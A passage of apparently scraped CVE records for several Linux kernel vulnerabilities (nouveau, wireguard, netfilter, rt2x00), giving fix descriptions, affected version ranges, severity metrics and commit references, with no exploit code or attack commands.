since\nwe want it on all CPUs and it\u0027s write followed by a read.\n\nv2: use paired smp_rmb/smp_wmb."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:29.153Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bba8ec5e9b16649d85bc9e9086bf7ae5b5716ff9"
},
{
"url": "https://git.kernel.org/stable/c/1bc4825d4c3ec6abe43cf06c3c39d664d044cbf7"
},
{
"url": "https://git.kernel.org/stable/c/13d76b2f443dc371842916dd8768009ff1594716"
},
{
"url": "https://git.kernel.org/stable/c/3ab056814cd8ab84744c9a19ef51360b2271c572"
},
{
"url": "https://git.kernel.org/stable/c/ad74d208f213c06d860916ad40f609ade8c13039"
},
{
"url": "https://git.kernel.org/stable/c/a019b44b1bc6ed224c46fb5f88a8a10dd116e525"
},
{
"url": "https://git.kernel.org/stable/c/21ca9539f09360fd83654f78f2c361f2f5ddcb52"
},
{
"url": "https://git.kernel.org/stable/c/fff1386cc889d8fb4089d285f883f8cba62d82ce"
}
],
"title": "nouveau: fix instmem race condition around ptr stores",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26984",
"datePublished": "2024-05-01T05:27:20.506Z",
"dateReserved": "2024-02-19T14:20:24.204Z",
"dateUpdated": "2025-11-04T17:15:10.866Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26861 (GCVE-0-2024-26861)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wireguard: receive: annotate data-race around receiving_counter.counter
Syzkaller with KCSAN identified a data-race issue when accessing
keypair->receiving_counter.counter. Use READ_ONCE() and WRITE_ONCE()
annotations to mark the data race as intentional.
BUG: KCSAN: data-race in wg_packet_decrypt_worker / wg_packet_rx_poll
write to 0xffff888107765888 of 8 bytes by interrupt on cpu 0:
counter_validate drivers/net/wireguard/receive.c:321 [inline]
wg_packet_rx_poll+0x3ac/0xf00 drivers/net/wireguard/receive.c:461
__napi_poll+0x60/0x3b0 net/core/dev.c:6536
napi_poll net/core/dev.c:6605 [inline]
net_rx_action+0x32b/0x750 net/core/dev.c:6738
__do_softirq+0xc4/0x279 kernel/softirq.c:553
do_softirq+0x5e/0x90 kernel/softirq.c:454
__local_bh_enable_ip+0x64/0x70 kernel/softirq.c:381
__raw_spin_unlock_bh include/linux/spinlock_api_smp.h:167 [inline]
_raw_spin_unlock_bh+0x36/0x40 kernel/locking/spinlock.c:210
spin_unlock_bh include/linux/spinlock.h:396 [inline]
ptr_ring_consume_bh include/linux/ptr_ring.h:367 [inline]
wg_packet_decrypt_worker+0x6c5/0x700 drivers/net/wireguard/receive.c:499
process_one_work kernel/workqueue.c:2633 [inline]
...
read to 0xffff888107765888 of 8 bytes by task 3196 on cpu 1:
decrypt_packet drivers/net/wireguard/receive.c:252 [inline]
wg_packet_decrypt_worker+0x220/0x700 drivers/net/wireguard/receive.c:501
process_one_work kernel/workqueue.c:2633 [inline]
process_scheduled_works+0x5b8/0xa30 kernel/workqueue.c:2706
worker_thread+0x525/0x730 kernel/workqueue.c:2787
...
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a9e90d9931f3a474f04bab782ccd9d77904941e9 Version: a9e90d9931f3a474f04bab782ccd9d77904941e9 Version: a9e90d9931f3a474f04bab782ccd9d77904941e9 Version: a9e90d9931f3a474f04bab782ccd9d77904941e9 Version: a9e90d9931f3a474f04bab782ccd9d77904941e9 Version: a9e90d9931f3a474f04bab782ccd9d77904941e9 Version: a9e90d9931f3a474f04bab782ccd9d77904941e9 Version: 4a7939808afdc57ecaeb72d049e2985321a1e44e |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:04.156Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f87884e0dffd61b47e58bc6e1e2f6843c212b0cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d691be84ab898cf136a35176eaf2f8fc116563f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/45a83b220c83e3c326513269afbf69ae6fc65cce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/78739d72f16b2d7d549f713f1dfebd678d32484b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3f94da807fe1668b9830f0eefbbf7e887b0a7bc6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fdf16de078a97bf14bb8ee2b8d47cc3d3ead09ed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bba045dc4d996d03dce6fe45726e78a1a1f6d4c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26861",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:32.233125Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:26.632Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireguard/receive.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f87884e0dffd61b47e58bc6e1e2f6843c212b0cc",
"status": "affected",
"version": "a9e90d9931f3a474f04bab782ccd9d77904941e9",
"versionType": "git"
},
{
"lessThan": "d691be84ab898cf136a35176eaf2f8fc116563f0",
"status": "affected",
"version": "a9e90d9931f3a474f04bab782ccd9d77904941e9",
"versionType": "git"
},
{
"lessThan": "45a83b220c83e3c326513269afbf69ae6fc65cce",
"status": "affected",
"version": "a9e90d9931f3a474f04bab782ccd9d77904941e9",
"versionType": "git"
},
{
"lessThan": "78739d72f16b2d7d549f713f1dfebd678d32484b",
"status": "affected",
"version": "a9e90d9931f3a474f04bab782ccd9d77904941e9",
"versionType": "git"
},
{
"lessThan": "3f94da807fe1668b9830f0eefbbf7e887b0a7bc6",
"status": "affected",
"version": "a9e90d9931f3a474f04bab782ccd9d77904941e9",
"versionType": "git"
},
{
"lessThan": "fdf16de078a97bf14bb8ee2b8d47cc3d3ead09ed",
"status": "affected",
"version": "a9e90d9931f3a474f04bab782ccd9d77904941e9",
"versionType": "git"
},
{
"lessThan": "bba045dc4d996d03dce6fe45726e78a1a1f6d4c3",
"status": "affected",
"version": "a9e90d9931f3a474f04bab782ccd9d77904941e9",
"versionType": "git"
},
{
"status": "affected",
"version": "4a7939808afdc57ecaeb72d049e2985321a1e44e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireguard/receive.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.6.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwireguard: receive: annotate data-race around receiving_counter.counter\n\nSyzkaller with KCSAN identified a data-race issue when accessing\nkeypair-\u003ereceiving_counter.counter. Use READ_ONCE() and WRITE_ONCE()\nannotations to mark the data race as intentional.\n\n BUG: KCSAN: data-race in wg_packet_decrypt_worker / wg_packet_rx_poll\n\n write to 0xffff888107765888 of 8 bytes by interrupt on cpu 0:\n counter_validate drivers/net/wireguard/receive.c:321 [inline]\n wg_packet_rx_poll+0x3ac/0xf00 drivers/net/wireguard/receive.c:461\n __napi_poll+0x60/0x3b0 net/core/dev.c:6536\n napi_poll net/core/dev.c:6605 [inline]\n net_rx_action+0x32b/0x750 net/core/dev.c:6738\n __do_softirq+0xc4/0x279 kernel/softirq.c:553\n do_softirq+0x5e/0x90 kernel/softirq.c:454\n __local_bh_enable_ip+0x64/0x70 kernel/softirq.c:381\n __raw_spin_unlock_bh include/linux/spinlock_api_smp.h:167 [inline]\n _raw_spin_unlock_bh+0x36/0x40 kernel/locking/spinlock.c:210\n spin_unlock_bh include/linux/spinlock.h:396 [inline]\n ptr_ring_consume_bh include/linux/ptr_ring.h:367 [inline]\n wg_packet_decrypt_worker+0x6c5/0x700 drivers/net/wireguard/receive.c:499\n process_one_work kernel/workqueue.c:2633 [inline]\n ...\n\n read to 0xffff888107765888 of 8 bytes by task 3196 on cpu 1:\n decrypt_packet drivers/net/wireguard/receive.c:252 [inline]\n wg_packet_decrypt_worker+0x220/0x700 drivers/net/wireguard/receive.c:501\n process_one_work kernel/workqueue.c:2633 [inline]\n process_scheduled_works+0x5b8/0xa30 kernel/workqueue.c:2706\n worker_thread+0x525/0x730 kernel/workqueue.c:2787\n ..."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:00.752Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f87884e0dffd61b47e58bc6e1e2f6843c212b0cc"
},
{
"url": "https://git.kernel.org/stable/c/d691be84ab898cf136a35176eaf2f8fc116563f0"
},
{
"url": "https://git.kernel.org/stable/c/45a83b220c83e3c326513269afbf69ae6fc65cce"
},
{
"url": "https://git.kernel.org/stable/c/78739d72f16b2d7d549f713f1dfebd678d32484b"
},
{
"url": "https://git.kernel.org/stable/c/3f94da807fe1668b9830f0eefbbf7e887b0a7bc6"
},
{
"url": "https://git.kernel.org/stable/c/fdf16de078a97bf14bb8ee2b8d47cc3d3ead09ed"
},
{
"url": "https://git.kernel.org/stable/c/bba045dc4d996d03dce6fe45726e78a1a1f6d4c3"
}
],
"title": "wireguard: receive: annotate data-race around receiving_counter.counter",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26861",
"datePublished": "2024-04-17T10:27:24.980Z",
"dateReserved": "2024-02-19T14:20:24.184Z",
"dateUpdated": "2025-05-04T12:55:00.752Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26581 (GCVE-0-2024-26581)
Vulnerability from cvelistv5
Published
2024-02-20 12:52
Modified
2025-10-01 19:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_set_rbtree: skip end interval element from gc
rbtree lazy gc on insert might collect an end interval element that has
been just added in this transactions, skip end interval elements that
are not yet active.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8284a79136c384059e85e278da2210b809730287 Version: acaee227cf79c45a5d2d49c3e9a66333a462802c Version: 893cb3c3513cf661a0ff45fe0cfa83fe27131f76 Version: 50cbb9d195c197af671869c8cadce3bd483735a0 Version: 89a4d1a89751a0fbd520e64091873e19cc0979e8 Version: f718863aca469a109895cb855e6b81fff4827d71 Version: f718863aca469a109895cb855e6b81fff4827d71 Version: f718863aca469a109895cb855e6b81fff4827d71 Version: cd66733932399475fe933cb3ec03e687ed401462 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26581",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-30T19:31:46.616632Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-01T19:10:25.971Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.615Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c60d252949caf9aba537525195edae6bbabc35eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10e9cb39313627f2eae4cd70c4b742074e998fd8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4cee42fcf54fec46b344681e7cc4f234bb22f85a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2bab493a5624444ec6e648ad0d55a362bcb4c003"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1296c110c5a0b45a8fcf58e7d18bc5da61a565cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b734f7a47aeb32a5ba298e4ccc16bb0c52b6dbf7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6eb14441f10602fa1cf691da9d685718b68b78a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/60c0c230c6f046da536d3df8b39a20b9a9fd6af0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_set_rbtree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c60d252949caf9aba537525195edae6bbabc35eb",
"status": "affected",
"version": "8284a79136c384059e85e278da2210b809730287",
"versionType": "git"
},
{
"lessThan": "10e9cb39313627f2eae4cd70c4b742074e998fd8",
"status": "affected",
"version": "acaee227cf79c45a5d2d49c3e9a66333a462802c",
"versionType": "git"
},
{
"lessThan": "4cee42fcf54fec46b344681e7cc4f234bb22f85a",
"status": "affected",
"version": "893cb3c3513cf661a0ff45fe0cfa83fe27131f76",
"versionType": "git"
},
{
"lessThan": "2bab493a5624444ec6e648ad0d55a362bcb4c003",
"status": "affected",
"version": "50cbb9d195c197af671869c8cadce3bd483735a0",
"versionType": "git"
},
{
"lessThan": "1296c110c5a0b45a8fcf58e7d18bc5da61a565cb",
"status": "affected",
"version": "89a4d1a89751a0fbd520e64091873e19cc0979e8",
"versionType": "git"
},
{
"lessThan": "b734f7a47aeb32a5ba298e4ccc16bb0c52b6dbf7",
"status": "affected",
"version": "f718863aca469a109895cb855e6b81fff4827d71",
"versionType": "git"
},
{
"lessThan": "6eb14441f10602fa1cf691da9d685718b68b78a9",
"status": "affected",
"version": "f718863aca469a109895cb855e6b81fff4827d71",
"versionType": "git"
},
{
"lessThan": "60c0c230c6f046da536d3df8b39a20b9a9fd6af0",
"status": "affected",
"version": "f718863aca469a109895cb855e6b81fff4827d71",
"versionType": "git"
},
{
"status": "affected",
"version": "cd66733932399475fe933cb3ec03e687ed401462",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_set_rbtree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.5"
},
{
"lessThan": "6.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10.190",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.15.124",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "6.1.43",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_rbtree: skip end interval element from gc\n\nrbtree lazy gc on insert might collect an end interval element that has\nbeen just added in this transactions, skip end interval elements that\nare not yet active."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:12.921Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c60d252949caf9aba537525195edae6bbabc35eb"
},
{
"url": "https://git.kernel.org/stable/c/10e9cb39313627f2eae4cd70c4b742074e998fd8"
},
{
"url": "https://git.kernel.org/stable/c/4cee42fcf54fec46b344681e7cc4f234bb22f85a"
},
{
"url": "https://git.kernel.org/stable/c/2bab493a5624444ec6e648ad0d55a362bcb4c003"
},
{
"url": "https://git.kernel.org/stable/c/1296c110c5a0b45a8fcf58e7d18bc5da61a565cb"
},
{
"url": "https://git.kernel.org/stable/c/b734f7a47aeb32a5ba298e4ccc16bb0c52b6dbf7"
},
{
"url": "https://git.kernel.org/stable/c/6eb14441f10602fa1cf691da9d685718b68b78a9"
},
{
"url": "https://git.kernel.org/stable/c/60c0c230c6f046da536d3df8b39a20b9a9fd6af0"
}
],
"title": "netfilter: nft_set_rbtree: skip end interval element from gc",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26581",
"datePublished": "2024-02-20T12:52:57.398Z",
"dateReserved": "2024-02-19T14:20:24.125Z",
"dateUpdated": "2025-10-01T19:10:25.971Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52595 (GCVE-0-2023-52595)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: rt2x00: restart beacon queue when hardware reset
When a hardware reset is triggered, all registers are reset, so all
queues are forced to stop in hardware interface. However, mac80211
will not automatically stop the queue. If we don't manually stop the
beacon queue, the queue will be deadlocked and unable to start again.
This patch fixes the issue where Apple devices cannot connect to the
AP after calling ieee80211_restart_hw().
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52595",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T16:31:56.163263Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:17.907Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.313Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e1f113b57ddd18274d7c83618deca25cc880bc48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69e905beca193125820c201ab3db4fb0e245124e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4cc198580a7b93a36f5beb923f40f7ae27a3716c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/739b3ccd9486dff04af95f9a890846d088a84957"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04cfe4a5da57ab9358cdfadea22bcb37324aaf83"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fdb580ed05df8973aa5149cafa598c64bebcd0cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a11d965a218f0cd95b13fe44d0bcd8a20ce134a8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ralink/rt2x00/rt2x00dev.c",
"drivers/net/wireless/ralink/rt2x00/rt2x00mac.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e1f113b57ddd18274d7c83618deca25cc880bc48",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "69e905beca193125820c201ab3db4fb0e245124e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4cc198580a7b93a36f5beb923f40f7ae27a3716c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "739b3ccd9486dff04af95f9a890846d088a84957",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "04cfe4a5da57ab9358cdfadea22bcb37324aaf83",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fdb580ed05df8973aa5149cafa598c64bebcd0cb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a11d965a218f0cd95b13fe44d0bcd8a20ce134a8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ralink/rt2x00/rt2x00dev.c",
"drivers/net/wireless/ralink/rt2x00/rt2x00mac.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
